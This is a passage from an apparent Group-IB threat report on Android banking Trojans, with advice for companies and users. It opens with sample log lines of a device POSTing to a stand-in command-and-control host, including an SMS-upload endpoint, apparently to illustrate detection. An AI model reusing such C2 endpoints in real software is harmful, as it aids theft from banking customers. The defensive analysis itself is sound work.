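    "2019-03-28T10:00:01Z 10.0.0.5 POST http://cnc.example/api/v1/get.php 200",
    "2019-03-28T10:00:03Z 10.0.0.5 POST http://cnc.example/api/v1/load_sms.php 200",
    "2019-03-28T10:00:07Z 10.0.0.9 GET http://shop.example/api/v1/get.php?x=1 200",
    "2019-03-28T10:00:09Z 10.0.0.9 GET http://shop.example/api/v2/records.php 404",
]
```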

Recommendations

To protect their customers from mobile Trojan threats, companies should use comprehensive solutions that allow them to detect and block malicious activity without installing additional software on users' devices.

To achieve this, signature-based methods of detecting mobile Trojans need to be reinforced with technologies that analyze the behaviour of both the client and the application itself. Protection should also include device identification based on digital fingerprinting, which makes it possible to recognize when an account is being used from an atypical device that has already fallen into a fraudster's hands.

A fundamentally important point is the availability of cross-channel analysis, which allows companies to control risks arising not only on the web but also in the mobile channel, for example in mobile banking applications, cryptocurrency transactions and any other place where financial transactions can be performed.

Safety rules for users:

  • do not install applications on an Android mobile device from any source other than Google Play, and pay special attention to the permissions an application requests;
  • install Android OS updates regularly;
  • pay attention to the extensions of downloaded files;
  • do not visit suspicious resources;
  • do not click on links received in SMS messages.

Prepared by Semyon Rogachev, junior malware research specialist at the Group-IB Computer Forensics Laboratory.

Source: www.habr.com
